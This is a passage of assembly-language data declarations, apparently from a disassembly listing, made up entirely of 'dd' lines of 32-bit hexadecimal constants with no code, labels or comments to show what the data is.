		dd 5EB2Fh, 93F010C5h, 76EA4C1Fh, 7AE2BB01h, 5FF13E76h
		dd 1E72CD17h, 0C8ED2201h, 6C1B05F7h, 35DAFE10h,	0A429EED1h
		dd 735FA36Bh, 0D94B74B1h, 86F11B60h, 0BDEA4543h, 0D68F29DEh
		dd 8BC1A121h, 0AE8DA2FFh, 882E0CC5h, 344B51FCh,	7FBBCBB5h
		dd 6A9793C3h, 1CD5C2B9h, 86E2BAF0h, 7002DEFAh, 0C8187B1Fh
		dd 0EE07C5D9h, 0A839C62Ah, 62A68F18h, 0FEC6F5B7h, 0C96ABFF7h
		dd 0EFC9918Ch, 0A4BAC20Eh, 28D01D75h, 0DAE8E24Ch, 1AAEE1AFh
		dd 57E5A9B0h, 55618A9Ch, 0C8753BBCh, 39CC0A90h,	6ACA7F98h
		dd 7D307CFDh, 432070E5h, 0F699C0C4h, 3748419Dh,	0CB893A3h
		dd 33E96C66h, 0A88D9F8Eh, 0CD091198h, 8A39047Eh, 4BA3813Eh
		dd 11DACA4Bh, 550E218h,	0F73F05AAh, 489557D0h, 3D288BA3h
		dd 8B24ECFBh, 846607B6h, 115F5943h, 5824BCFFh, 78A689DCh
		dd 8A6F2723h, 3165AB1h,	32D0D1A6h, 67222798h, 10A42631h
		dd 21CBD0CDh, 3CCD048Bh, 0AAD30ACCh, 6268CD5Eh,	6ACD6156h
		dd 6A067BBFh, 0E5317D7Dh, 50CA57ECh, 442D2C55h,	0C1ABB80Dh
		dd 0AAB414C1h, 67EA1C99h, 88AA8757h, 6466BF79h,	0EE349821h
		dd 0ABFC6C06h, 8451C5Ch, 16523683h, 823A2A9h, 9E875D48h
		dd 4EA5ABACh, 0BE06077h, 122EA2B0h, 174DAEC4h, 4415EC6Dh
		dd 0E0C1E80Eh, 0B45756D9h, 0F9C3D15h, 4CFF22CEh, 27711D7h
		dd 0BF5D1A81h, 553E8AC2h, 0D4D25769h, 0DD2968D0h, 0A15F18E5h
		dd 31192A2Dh, 95FFF8A1h, 528DD01h, 94E784A4h, 20613A71h
		dd 1960D656h, 0A58185A7h, 0A054B1A8h, 0F2ED16BBh, 0B1A00FB8h
		dd 36039640h, 0ACD52F9h, 5052A5h, 88A0DB1Ah, 10AEC629h
		dd 5D430860h, 0B27CE10Ah, 92DD459Dh, 65F0AAB1h,	641B10D9h
		dd 55D5C03Ch, 1DD9F904h, 4490649Dh, 0AF66334Bh,	29111058h
		dd 40362006h, 9600C55Dh, 12D35969h, 5B3D9C54h, 50B440C1h
		dd 841834BDh, 21A84C04h, 20BB60ECh, 2D37912h, 339085Bh
		dd 0BD140383h, 33488B9Ah, 0DF535537h, 568C1AD8h, 3479ACC3h
		dd 6F4611D0h, 708DA31Bh, 8ABC5DFh, 7786EDDBh, 1D8BAE4Ch
		dd 71BA0697h, 7A8FBD1Dh, 0D5DA97A1h, 26266A97h,	630C7565h
		dd 3CAB5F35h, 0AFFF9622h, 60E8C1ADh, 3D7454DBh,	0BC1E64E2h
		dd 993C2980h, 8C53AE17h, 118E5E90h, 0A0CD7E86h,	0CEB43C85h
		dd 0CA058B31h, 9AD02D11h, 0D420CF5Dh, 784F7F18h, 3D2FC1BDh
		dd 0C82748E2h, 0CBA760C6h, 6070A451h, 8862C05Ah, 0C99E6610h
		dd 0D6BFD5F1h, 0EB0A5031h, 0FC2AD17Dh, 0F7102F8Bh, 442D1185h
		dd 91ABD24Fh, 0DCE51A01h, 3185AA75h, 9386ACB4h,	459E5A3h
		dd 6BAD51A6h, 38B5969Bh, 32025566h, 0F18040C0h,	5FC1AAD6h
		dd 460861E6h, 0CBA5E19Dh, 514D562Dh, 0AFC0C594h, 1881E804h
		dd 2AE5E8E3h, 0F611634Bh, 526B1587h, 0D670050Fh, 59D57408h
		dd 0DBC2036Dh, 289C73F3h, 43F08A65h, 0DC69D74Fh, 0B192B815h
		dd 4AC2C62h, 460BA2CCh,	6D0BED8h, 0CF5CA071h, 0EA8C427Dh
		dd 6613E67Ah, 4565757Ah, 0AD9A5C04h, 877CD46Dh,	40B8F45h
		dd 544B1DD6h, 35D746A0h, 99C5366Bh, 0D660B471h,	0EDC646BAh
		dd 6EA2679Ah, 0F1CBBAFEh, 8C0B89BBh, 8B3C31BDh,	959EF7F0h
		dd 2E758FCCh, 79CC1730h
		dd 808B5A2Fh, 0C8312965h, 64F020F0h, 1597E515h,	3E38C254h
		dd 5235F417h, 7ED81C29h, 429E128h, 7513FE5Ch, 72A8B965h
		dd 19670009h, 4854A651h, 660C864h, 890F4185h, 0DC5D3024h
		dd 8755C2FEh, 72C87595h, 4CA34005h, 922A9954h, 0E32F14C7h
		dd 924FAAA3h, 0CCC19013h, 68C45CACh, 0A50582D5h, 0F4AC5915h
		dd 65A0E0A2h, 1BC5DFB5h, 0C0258C5Ch, 0E3540F6Eh, 67495FC5h
		dd 31145B65h, 75BCD44h,	0F5DF54CDh, 0F8BBF220h,	14A4FC97h
		dd 60FDDA3Dh, 12CC1E86h, 0C30004A2h, 5573853Dh,	8F45F5C2h
		dd 0AEAE264Dh, 55554428h, 889E1ACh, 9CDDB7F2h, 29B733F6h
		dd 0F6F9B70Bh, 6036B55Ch, 0C317BCA4h, 0A495DEB6h, 0FF0C696Bh
		dd 0EB55756Bh, 68C3AB36h, 0DDDD9BC1h, 0BF3843E8h, 0F29E5569h
		dd 6894AA03h, 8623F28Bh, 0CB67AF82h, 0D60E2027h, 0F5268A68h
		dd 8DD125B3h, 6437689Bh, 38163EE1h, 0B45A7E8Fh,	0A6215148h
		dd 482A9A3Fh, 0BF047E08h, 0FC01C354h, 44167D25h, 0B368C8AAh
		dd 57E0201Ch, 0A421FEC7h, 0D7A3994Bh, 6D0C8163h, 0C449B542h
		dd 4C088D22h, 35D71C60h, 0F0C0C962h, 1339BACEh,	1451924Ch
		dd 776B740Dh, 0AAAA8FD9h, 2323AA58h, 3BF01A18h,	4F374872h
		dd 0EC985F70h, 0DB43E46Fh, 0A4C3A7D8h, 0BC2F6711h, 6BCBB16Ch
		dd 0DA429705h, 0A2D8D052h, 0CABA17C8h, 8DE44C1Bh, 77057570h
		dd 9012300Eh, 6EF0F210h, 0EA007317h, 0E003175h,	17EA66F1h
		dd 82DB5674h, 0CAAE993Dh, 8E066662h, 1A75598h, 2A0AE9F6h
		dd 479ED384h, 106DD788h, 2506CAB9h, 0FBD0EE1Bh,	0DBE743F0h
		dd 2E922A12h, 0F6089B0Dh, 0B8A39C5Ch, 80E92DBEh, 80A0ACD9h
		dd 8848F449h, 18DD882Ch, 0B1711BA8h, 746CF5A1h,	3939B01Dh
		dd 31176ACFh, 0BA95D545h, 333EE210h, 9DA35FF8h,	6632D748h
		dd 0E1918198h, 7F65E4EFh, 65F155F8h, 57AA7658h,	0A188E347h
		dd 62E2F387h, 19C632D3h, 0B180B140h, 861C330h, 540A1DABh
		dd 1F533826h, 0F46C9A03h, 6E7C9F27h, 3A3E1FFAh,	7FA3E5D4h
		dd 0D23FD423h, 0A2886043h, 0C419350Dh, 0C63FDC1Fh, 0EE11578Ch
		dd 0EB3B537Dh, 49644640h, 0ACAFEF77h, 0CBFC6038h, 622AC89h
		dd 0BDB3F4DFh, 5164EF64h, 42B52301h, 210ED857h,	2A3A80E6h
		dd 685B503Eh, 301935AAh, 16416B7h, 0C10A89CFh, 7A6888E3h
		dd 870C02D8h, 0E36EE100h, 0B931497Dh, 17C823Ah,	40527433h
		dd 0D79054EDh, 0F702AB39h, 2477275Ch, 5FA3D6A0h, 0F19633E1h
		dd 649364C5h, 0F6663FCBh, 12391981h, 0CE9808B9h, 317D7055h
		dd 0C65EE54h, 6B409E38h, 0E66619CEh, 2D315AD4h,	820D6AECh
		dd 0EAD14BEFh, 0B46A752Eh, 49172172h, 829E22EDh, 42040049h
		dd 35809317h, 3585C63h,	44A9D5Dh, 518E0A5Bh, 28898059h
		dd 4E52ED11h, 0B844410Fh, 6F11AD25h, 91A098A7h,	9772488h
		dd 240648F6h, 193D0112h, 8298A0F9h, 0EE36C444h,	7572E400h
		dd 624B87FFh, 4E29D4C8h, 443204AEh, 0BEB5B7CCh,	41BF60A9h
		dd 0B80E4D45h, 55CC1575h, 51F034E7h, 97D4BF80h,	28B480D7h
		dd 0EA4B0701h, 0D9D37322h, 6C6AEE8Ah, 22939535h, 54C1AB62h
		dd 0A5D4810Bh, 25A300C9h, 0A1EAD732h, 6DC188A8h, 0B8D5D8BAh
		dd 1F16594Dh, 0B791B46Ch, 0AEA3E8BBh, 10B4E7E2h, 0ED7BBB7Ah
		dd 0EA4F4297h, 0EBBB1F5Ah, 0C0B14422h, 0A709E171h, 16EB477Dh
		dd 0DED49EF5h, 0E4CEDC02h, 5A8E4542h, 0CA103113h, 0C40A23F3h
		dd 556C45Ch, 8AFC57DEh,	962AA8D5h, 0D98855F1h, 0F52AF74Ah
		dd 9D74B603h, 40923111h, 11464AC1h, 0BD3D7ECEh,	0AA2E57C6h
		dd 0EE2E0518h, 87BF749h, 8C5EFBFCh, 0E927AC4Ah,	0FE2A7C46h
		dd 0AE2EC49Ah, 4B436607h, 9168B742h, 1519361Ah,	0ED2E462Ch
		dd 0DCE32B28h, 23840C1Dh, 45936BAFh, 93883432h,	2859F405h
		dd 0F669343Fh, 40975D35h, 8C76A89Eh, 763A3A4Dh,	63F7ED53h
		dd 733183ABh, 0A5F11119h, 0CEC9EE2Ah, 86059C45h, 2969CE29h
		dd 836125CEh, 78C923D6h, 0FCA74139h, 7368BC0Ah,	2404A581h
		dd 68CA4057h, 65582223h, 33523802h, 8A3BC3FBh, 0D49A9B4Eh
		dd 0B9692521h, 0A30B0755h, 60F85B5Dh, 9301F560h, 2911561Ah
		dd 4387EAA4h, 78E280C5h, 603A9063h, 3298549Ah, 0CDA30C3Fh
		dd 0A5576B02h, 0F7CCD8C0h, 9531C0BBh, 0EA1F4C12h, 957B598Ch
		dd 803508B2h, 0ACB655F2h, 0D40B5AA8h, 8B8AB06Ah, 1E7A31CAh
		dd 4051227Fh, 0BF67BEB8h, 5233EFC2h, 3627E87Ch,	45190C9Bh
		dd 0D3B83B94h, 7BE09400h, 9B8D9637h, 25560196h,	0F177F297h
		dd 9EC430EAh, 755332C0h, 16535173h, 56C2D879h, 614ED61Dh
		dd 0B54AA656h, 4097624Ah, 2B89189Dh, 61596611h,	57C634F1h
		dd 71A6F614h, 355D295Eh, 688E4AD7h, 81ADE2E4h, 1BFC9599h
		dd 6A013590h, 589D1170h, 41A0C205h, 0FC6B9FBFh,	0AED37C02h
		dd 0FD6EE7EAh, 3E3828F1h, 7EB57B32h, 42E01E5Fh,	531F818h
		dd 0C782E4B1h, 0D1F5F423h, 104EA8B7h, 33745462h, 59D1374Ah
		dd 40E18F85h, 296A8D5h,	9A331C4Ah, 0E931E00Fh, 247F2902h
		dd 84181CCh, 0F7D823D7h, 0CF5AAE0Ch, 49170A37h,	9D5C8D3Eh
		dd 0B7242BC7h, 0AB49363Dh, 28AF630Eh, 2843D90Fh, 0A2640DB0h
		dd 0D026134Dh, 4C626134h, 1CBA4913h, 67864C1h, 12A4DF01h
		dd 0C4AA8F5Bh, 32D523D5h, 314E88F5h, 9A5A10AFh,	0D2A09DC4h
		dd 0B5432C00h, 0F8E3621Eh, 0D6D4DE83h, 7016AE81h, 0E8C7C82Fh
		dd 10A53D8Ah, 3F764C21h, 8DFA2CC2h, 394CDDCCh, 79A8E04Fh
		dd 0E5C0BC81h, 74B56E99h, 85B48B9Dh, 0E9355313h, 72682F2Bh
		dd 0B9BB56B1h, 0AB778A3Ah, 56AC185Bh, 70DE1974h, 12F01C68h
		dd 3466B04Ch, 3AA2ECABh, 655D7F8Eh, 0D13B62A0h,	57AB3FABh
		dd 0B51790C7h, 51D4C49Ah, 0B709344h, 50CE5FF3h,	0FBFC0BD7h
		dd 316082D4h, 0C690DF40h, 0ED584821h, 8C420B8Bh, 6CD3172Ch
		dd 0D22C63A8h, 70E47DFFh, 2BEEEAA7h, 0E4AC4530h, 5BBD90D0h
		dd 553B305Bh, 0BEAE7B57h, 17BE0597h, 0E3A6225h,	8BBAA595h
		dd 26ED108h, 0B88CC393h, 0EE396F62h, 0CEF6C0B0h, 6AC9EB02h
		dd 0E8617853h, 0BA2C723Ah, 25415548h, 892EEA24h, 87572E61h
		dd 9A9230C1h, 4A0D36DFh, 30BC17D4h, 0D29F692h, 2D0A2DFh
		dd 1CD22B55h, 62FB4566h, 62901983h, 294B0A71h, 0C6F1F1F3h
		dd 47A7F184h, 267525D6h, 84A7B34h, 81D7709Ch, 0BD6CB370h
		dd 0C4A4CA9h, 616ADE1Fh, 0FFD6BE48h, 9F813413h,	91DB5D71h
		dd 0A10FFB88h, 0A7A0EFB7h, 6C71CBABh, 3188BD0Ch, 6005EB46h
		dd 0AA848B6h, 71685EF2h, 887D087Dh, 7E0C7DBDh, 48AF028h
		dd 96A5AFB0h, 8597ECBAh, 0B346FC95h, 61518150h,	5ADA5681h
		dd 0B29EF99Ah, 0A8BCA2AAh, 956B2C24h, 0D607EAB2h, 0EAEE9745h
		dd 1F03CA40h, 3AF1270Eh, 0F7D0586Fh, 8604443h, 0F723C8F8h
		dd 0D93401B8h, 545603F1h, 0B2A5154h, 54F848C2h,	0CC583A5h
		dd 2527A5F8h, 96851D81h, 508E7F8Bh, 8A044C34h, 1BDC2596h
		dd 52F1BD7Fh, 0F6789EAFh, 0EB54BEB8h, 0AA7B14DEh, 79079145h
		dd 5FC5AD1Ch, 0BCF32DD4h, 0C1DF5D45h, 0DE69899Ah, 0D72E790Bh
		dd 6057884Bh, 98395D69h, 0AE9CD21Ch, 2F645033h,	5A13D0A2h
		dd 0B62E15C9h, 4981D578h, 812FF190h, 2B1CDD39h,	6D270142h
		dd 0B8DA5A15h, 0E674AE73h, 817B4144h, 14B89B83h, 0C7046D0Ch
		dd 477E923Dh, 66F8ABA9h, 7C5488D6h, 0FBD9982Ah,	196F42BCh
		dd 0F9175A43h, 84B1B12Fh, 0B8B49346h, 3A8FA274h, 761F2C85h
		dd 4590E399h, 0D2285057h
		dd 38C418Eh, 0FF003CFDh, 97DED332h, 323C21C2h, 8B6EE0FAh
		dd 0EBF31F4h, 0A09C89C2h, 44882237h, 8155E70Bh,	0F64004A7h
		dd 42F66564h, 0DA80BD70h, 17D952FFh, 0CC9AE6FEh, 0A7DF471Dh
		dd 0E07FEB06h, 0F589B11Ah, 3B599DA5h, 18873139h, 0CAE9CD10h
		dd 3BBAF4A7h, 60C6D766h, 9C260B5Dh, 0AAF6C41Dh,	92DD540Dh
		dd 0DAC92B86h, 2D1F50EFh, 31589870h, 5F8CDA1Bh,	5CE305D8h
		dd 0E556FE9Dh, 0B4D48EEh, 0A3818DC8h, 8C3B840Fh, 7697BE96h
		dd 0F176E326h, 0BB7E9E53h, 0B35CE5CCh, 1368BDABh, 8346C59h
		dd 0C1C4E32Ah, 0DA4AB29h, 249F6E63h, 0A10A11DAh, 1ECBD03Fh
		dd 851FF866h, 24D53C0h,	32E081Fh, 91166A9Dh, 8231F028h
		dd 96061025h, 6A0F8393h, 0F5BAFD87h, 2A141864h,	0FECC88EBh
		dd 0EB59A2C9h, 3357D4E2h, 48844750h, 0E8D55950h, 757ACB80h
		dd 0D5386D8Dh, 24105619h, 0C062E047h, 4A1E9505h, 0D281EE9Dh
		dd 891B0FF6h, 7A3D1660h, 5E8ACC18h, 35EC113Fh, 0A0C03D8Bh
		dd 44A35146h, 4E1D41F0h, 676C4119h, 2A277233h, 0FC8924CEh
		dd 23DB3533h, 0B7B73481h, 77710771h, 80C488D5h,	0E3AAB8ECh
		dd 86036C56h, 77198323h, 611A911Ah, 46B0CBF0h, 0DCEE591Bh
		dd 47F500E9h, 0FE5EC1D7h, 30019F69h, 80D4D813h,	0A5919A00h
		dd 0C9A3631Ch, 0CA685537h, 4C2E2358h, 73490194h, 1CA801A6h
		dd 0A1D2516Dh, 0C52F01E6h, 5515A49Dh, 9A9634A4h, 0C2C5C672h
		dd 46034D2Ch, 53F5482Dh, 6E9EA339h, 568ADDA6h, 0D2043990h
		dd 0F760DE65h, 53EE0A24h, 0DB24A373h, 386ACBBDh, 6A06D83h
		dd 79B85999h, 0EC2062D4h, 69B45868h, 0E8B9293Bh, 0D585D6FFh
		dd 0C626C61Ch, 0A604B338h, 0A2A70123h, 0B3AA4818h, 0A6FAB2Dh
		dd 0CC670A8h, 520985CAh, 48DB0EFAh, 0C0D90FC1h,	5023E386h
		dd 62F16A6Eh, 5D812269h, 88CEBB05h, 0F8665D36h,	0D6928C54h
		dd 0AE62CEB6h, 0DD644495h, 2451EEEh, 83C2B5A8h,	2ADB1126h
		dd 34227DF5h, 451996EFh, 0E728834Bh, 0D605C31Bh, 0B0A1039Dh
		dd 4F53828Dh, 40FE36CAh, 81A339C9h, 0B909A217h,	9003DBC7h
		dd 542E9CF3h, 0CC33B57Bh, 77B8B3BEh, 75924F63h,	0AD9FC03Dh
		dd 66B0616Eh, 31A0D02h,	34631E13h, 54C8BAE0h, 1600891h
		dd 8A3CD627h, 57E35632h, 0EC95A1CFh, 79F117ACh,	8F82825Ch
		dd 0EA3AFAD1h, 5F170D1h, 0A121E9CCh, 0C0A1D6h, 0CA06115h
		dd 88802323h, 0AC4AD84h, 0E363CFAEh, 31831B32h,	96031F40h
		dd 0E6192988h, 0C5F2B60Fh, 0A5B8D390h, 3E61041Ah, 0B7E0A01Bh
		dd 785AE2F0h, 0B5BA2D30h, 63723A11h, 83EF4654h,	3DB5F96Ah
		dd 5DA0FA82h, 0C40207A7h, 7116BACCh, 0C8690BC7h, 64863AEDh
		dd 7510477Eh, 820548C7h, 8C69F78Bh, 6B15126Bh, 0BC8CC748h
		dd 51689C1Ch, 293B4564h, 0B773CC19h, 0A2E2F85Dh, 51513068h
		dd 445E1912h, 0D86938C6h, 7882C2BAh, 8CDE5B05h,	0F28D4D1Ch
		dd 755229Bh, 0B52E1C1Ch, 9F461FA6h, 6AC7E2E8h, 56C084B2h
		dd 0BD391107h, 0BADAF941h, 0B77180C6h, 6C6DC8F6h, 5655E14Fh
		dd 8087C8ECh, 0AEB4DBE1h, 0ABE6101h, 5B136670h,	0F6FE8697h
		dd 0D406B41h, 0BAECB959h, 0B11E44B2h, 4901C2B5h, 61B67E81h
		dd 25F8D2C4h, 1068020h,	8CA953C1h, 42EA5104h, 2D68C6A5h
		dd 969838Eh, 0AAA98A02h, 0D7D1000Ah, 4B0A0DB4h,	3006500Ch
		dd 5A35C629h, 1A2A69E2h, 4C441418h, 0EC4500A3h,	87D12489h
		dd 0B661AF08h, 89D83A88h, 89C1350h, 0E22D45B7h,	0F468844Eh
		dd 0A17CD844h, 0F089C8C3h, 50F845Bh, 8C46088Dh,	2979116h
		dd 9C229294h, 3E083116h, 12E85311h, 4459B571h, 0B4E689D0h
		dd 1A6834CEh, 0F1A43AC6h, 2ECDFD10h, 89ECF1E1h,	76D4BD00h
		dd 446A4A1Eh, 611A067Dh, 0DC46F237h, 7211A48Dh,	0DE44A323h
		dd 3731A748h, 8DF06972h, 23741A44h, 493E468Bh, 408011A1h
		dd 3266F6DEh, 23AE8551h, 1F576AEBh, 0D6ABD4DFh,	0DB3F8DC9h
		dd 6E30E553h, 368CF31Ch, 90561EEAh, 90350318h, 60484D2Eh
		dd 5635635Bh, 0E450BE1Fh, 0C125D959h, 1F18F07Ah, 3FE7C18h
		dd 0CB409FDFh, 0D0A78603h, 6A768412h, 3E34416Bh, 0FA49A87Bh
		dd 898DE250h, 8545D31Ch, 0C24A1909h, 9412FE2Dh,	3ED24C02h
		dd 439F3134h, 3C2319E9h, 45A2AF68h, 2693E162h, 11B89507h
		dd 0C9388C04h, 1B3B0B41h, 334D650Bh, 0BA9264Bh,	0AA043DF8h
		dd 58EE90Dh, 57240793h,	0E51BCC4h, 605590F6h, 80C49886h
		dd 0A8A0158Fh, 0A7136A84h, 63B4235Ah, 8E3940E9h, 25839DFh
		dd 153B4B89h, 2A750E67h, 264C4173h, 118477B1h, 5DF20644h
		dd 0F19D137Ch, 0E798A945h, 0C181470Ch, 1431121Ch, 1BC06D5Bh
		dd 634B2462h, 0ED1FBC8Ch, 9E981563h, 4706496Dh,	23101141h
		dd 3BE06054h, 0BBFE33F8h, 9C000CDCh, 7A48B177h,	0C6298BAFh
		dd 0F0B93F99h, 0B258F475h, 0DA1259Ah, 1D0AB7DAh, 0FBD49390h
		dd 0B46C0FF2h, 156FDD54h, 0AB31234Ah, 90982EC1h, 2EF3888Ah
		dd 0D428CB3Bh, 96E36773h, 5C30656Ch, 247945E7h,	0FE919EDFh
		dd 97BC2C6Ah, 0F91FB00Bh, 24F222B6h, 0C7ED6058h, 3B2A4E8Eh
		dd 28600353h, 49380093h, 26A01262h, 58D5B3D7h, 0AB2F460Fh
		dd 0C46D8BB5h, 254096B8h, 25CA5064h, 0C6CAA98Ch, 0F6C8E032h
		dd 0D387DC28h, 52D1CAC6h, 2B085916h, 4727B88Dh,	23182A91h
		dd 0E90911EDh, 0B8BBCAFAh, 52F6319h, 461E3631h,	1773645Dh
		dd 0B3C05A71h, 6311D80Bh, 88342DA3h, 0E77164C1h, 29AD9001h
		dd 8CC9A58Ch, 0C45A7A0Ch, 2BECE12Fh, 744DDCDAh,	3DA325F9h
		dd 0B2C74C09h, 2969F4C9h, 39581A2Eh, 0CA755DFDh, 106B570h
		dd 0C65DA31Fh, 424B3389h, 53039EC5h, 0DA5DCCE6h, 231635EFh
		dd 8438F06Fh, 0C0168B5Ch, 5E0517AFh, 5582A04Eh,	0BECC4008h
		dd 14EF26A9h, 59CB8C09h, 17A8D2F7h, 0F3C3E4Dh, 0BD953A00h
		dd 6C55B838h, 0C4F3865Fh, 1DF5A78Ah, 0CB94338Eh, 6B8CF4AAh
		dd 0C49D0661h, 0DE720ED6h, 6687EA9h, 0FE41DFA9h, 53332125h
		dd 0F53B8CB6h, 5A95EAE3h, 45018AD8h, 9F6C376Eh,	0D758784Ch
		dd 25B315ABh, 9C1171E6h, 0ADC514BAh, 0C925D0CFh, 0F679EE7h
		dd 1E989FE8h, 7125F083h, 0BC0CCDEFh, 47F95300h,	0C56C529Eh
		dd 2D50DE47h, 0B28B63E7h, 0DF97663Eh, 0E919EE63h, 46630A3Ah
		dd 0B9D67F9Fh, 0AF2275C8h, 1138427Ch, 89E08D2Ah, 0E089285h
		dd 1BBAAAABh, 2F17C51Fh, 9FFC7458h, 0BA71273Bh,	3B8F6BDCh
		dd 53029983h, 0B6EEF13Dh, 0FA4FA7FEh, 94483EC4h, 0C07F3FA8h
		dd 64551A3Dh, 644CA079h, 0C5CA2590h, 6EC98272h,	0C82F692Ah
		dd 25AA5145h, 358FBC7Fh, 2B810968h, 44A85200h, 632C4D85h
		dd 4212FF2h, 0B1D1152h,	0E9EE536h, 1F2C8818h, 0BFC520C1h
		dd 0DF0B22B8h, 0CC8A626Fh, 0BCD3B407h, 65FC83E4h, 0AD2818F7h
		dd 84C8C82Ch, 0E80D2077h, 7E360917h, 24226036h,	6C557C69h
		dd 0C84EBF0h, 5D69963Bh, 134D054Eh, 2FA29F27h, 8897C460h
		dd 41AAC175h, 9B8DDE43h, 4FAE4174h, 0DF6109AAh,	532C610Fh
		dd 649C012Dh, 31622F90h, 202EDC5Fh, 9415084Bh, 544A4C3Ch
		dd 0C118C60h, 0DCEF5570h, 0CDFA2514h, 0CAF09176h, 3658E66Bh
		dd 4D63C41Bh, 3D5ED841h, 0D65F7F15h, 0D0F5DEAh,	1C16425Eh
		dd 2D518623h, 8ABA5839h, 0FF829478h, 4C68218Dh,	0A9F781D5h
		dd 0C0C048ABh, 0C64172C8h, 823C8968h, 98FBA84Ch, 94C24515h
		dd 0CC14702h, 17B52AC4h, 0B29E20B5h, 0D983D624h, 845CA2CBh
		dd 2C2EBE94h, 4B73B14Bh
		dd 16587020h, 5CDC5B71h, 845DB964h, 9646472Ch, 0B68C8A57h
		dd 6DEE8C1h, 68D7F1AFh,	90463E02h, 74E9880Ch, 0AE2E7BD1h
		dd 6C0C8168h, 4E2F0697h, 56056505h, 0D3E0C284h,	5F860FC3h
		dd 0CA2CC68h, 76B5E385h, 2A7F58A4h, 80F5146h, 977E1852h
		dd 5F03BFC4h, 0F0920387h, 625BBC76h, 0B609A6A4h, 92F83E7Ah
		dd 0D87B921Ch, 0A5D0B9B1h, 7CF5FC32h, 0CF0531A9h, 415311BBh
		dd 208D51F4h, 0A9AE2494h, 2F07093Eh, 4E00B61Bh,	9AF3144h
		dd 3B0754CEh, 710F074Ah, 8496529Bh, 0C6BAC267h,	298FD548h
		dd 74BCDDE2h, 0B4146719h, 840F520Ah, 0B027140h,	50324A25h
		dd 868A1E3Ah, 0FE4ECEA3h, 6914C75Ch, 0C48562B8h, 201D8028h
		dd 3375A739h, 4400E830h, 8C0D12DCh, 8107ABACh, 426BD84h
		dd 0C0C3B894h, 4ED8137h, 8BE711E2h, 0DD9DF470h,	5E3AFB2Bh
		dd 240CA500h, 0D306FC47h, 0C2330477h, 5B5406CFh, 79FC6021h
		dd 454108A5h, 0E211E0CBh, 62588C06h, 0A98D52C3h, 0EB299DA3h
		dd 3767CFB8h, 1506B182h, 2C652D4Dh, 957C4898h, 57398793h
		dd 6AC7E65h, 4680046Ah,	0C21A78F7h, 4A3D1717h, 9DAA9D42h
		dd 12F17564h, 0CF840E54h, 0D60F097Ch, 0A672F7C1h, 2161975h
		dd 0CCD688BBh, 26AC18Fh, 0EDA22BC9h, 0BABC18DDh, 0F8715758h
		dd 748698E2h, 7E723671h, 7590EF5Ch, 3B9D1BDh, 3E11315Fh
		dd 146F846Eh, 30DE3204h, 0DFA5ED48h, 9DF76677h,	0B12B822Bh
		dd 8C0BFCD0h, 0CBF1E25Eh, 7C109F72h, 8845EC70h,	5034431Bh
		dd 0F25FA1B4h, 0A4E05D62h, 681391F1h, 0D7F0905Bh, 3E412B96h
		dd 3EA6A545h, 0DA289123h, 7DB0F51h, 9322D19h, 2EC6A065h
		dd 58B0F93Eh, 8807166h,	679342B8h, 0F2CE9AE3h, 25260DF7h
		dd 7D2040Ah, 98800F81h,	0C7660A92h, 348E3091h, 7D940664h
		dd 63659864h, 62F4C606h, 0DC100EFCh, 691C92C0h,	1228F258h
		dd 551B0678h, 0DB9F691Ch, 0A2903CBAh, 3124CBA3h, 9F4A24E0h
		dd 9A3B21ABh, 0F3743E72h, 6255ACC0h, 0BCC0E391h, 52CD0881h
		dd 0DD02F28Ah, 0F2B77607h, 20053675h, 5D5A7209h, 853E9F5Ch
		dd 0BAC68861h, 4B091EBh, 0F44AEB81h, 62FAB95Bh,	5651AF22h
		dd 6BAE20E9h, 123EDF4Bh, 3E308AF5h, 5D9AFB0h, 0BB4A1C04h
		dd 7CA927F6h, 547D4541h, 0DB1A47EAh, 0B21890E1h, 0D286652h
		dd 1BAC92E3h, 0DE40F90h, 0F50CB317h, 24902A83h,	6D89801h
		dd 6D1019B8h, 0D0840C6Ch, 8867D183h, 19CDC334h,	3B54AE34h
		dd 18F51E91h, 0BEFE4056h, 49BA22A0h, 8344CF81h,	1E85FC8Fh
		dd 5F3B80DFh, 0DB115767h, 2ABB185Eh, 0A415340Dh, 0B174B168h
		dd 0DA855502h, 1632202Fh, 5571B8A1h, 0F6C06C61h, 6ECE30Ch
		dd 120146FBh, 43674168h, 0C4E93CEEh, 0D7180032h, 0B17F04ECh
		dd 0A37FBB0Ah, 0F6042FF6h, 8BDBAC77h, 0D8E3118Eh, 2FC315C1h
		dd 0E380EFAh, 4C6913A5h, 0B7F30191h, 463B4903h,	0D035C061h
		dd 0AFEEEB80h, 68B8103Bh, 0BB46D507h, 238730B3h, 61E418A2h
		dd 9AFB1ACBh, 0B834C488h, 38099CE0h, 80540594h,	8CE8C218h
		dd 0FC59C80h, 8B840E6Ah, 0C21528ACh, 29108A32h,	0A5C0702Dh
		dd 53145015h, 0AAC2F8E8h, 35401711h, 3FCDA402h,	8FB426AEh
		dd 0E2B9195Eh, 8169E47Fh, 0F8E4C6ECh, 396EB02Eh, 43F10687h
		dd 0E8B74481h, 189BAB60h, 88F24438h, 0CA0A8882h, 5CD64B16h
		dd 278A254Dh, 0A2D7380Dh, 0E5BE6ACh, 14D5095Fh,	0A0490113h
		dd 795C01B2h, 0B964083h, 46EDB1E7h, 0F7FFF2A2h,	8021E8Fh
		dd 0F293B564h, 0AA8C8FE1h, 8A1AD812h, 42CE44C4h, 0A1E85CF2h
		dd 0EC7136A5h, 941CD25Ah, 1ACAF5A3h, 0E1605B21h, 0AFBAEB81h
		dd 0E8C80500h, 1185D699h, 1166CB1Ch, 5B9C5C30h,	993F10EAh
		dd 1C243816h, 0FDDCD158h, 438B5DD4h, 0CB3AE1B0h, 6C0B770Ch
		dd 0F1207AFAh, 29546558h, 4AEF359Ah, 482B3541h,	0F168164Ch
		dd 6AD0AFC0h, 94DAB236h, 8B79C5BFh, 0DB5B37AAh,	0F51FAB62h
		dd 8E296595h, 89BB2EF8h, 59678DF9h, 344AB5CAh, 1EEAA51Fh
		dd 0CD39A435h, 4CEF4314h, 71BBF166h, 0D5F1010h,	0BC855F00h
		dd 538A768Ch, 8BC2B7BCh, 1545065Dh, 4A69AED8h, 480ECC63h
		dd 0B2541C7Ch, 0E45122BBh, 51B219C2h, 89AEB184h, 0B366803Bh
		dd 0C00CE401h, 7DDB031Ah, 0A28DD429h, 634675EAh, 45EE3223h
		dd 12D5D94Fh, 0ED39C431h, 5A69FA52h, 56910E96h,	0CA6B030Bh
		dd 8ADDBE80h, 1D0E2A00h, 0A26C4C2h, 203603E8h, 0EB24F551h
		dd 0A6E138B9h, 3393898Dh, 0C2D03125h, 7D898ECh,	8EE03CDAh
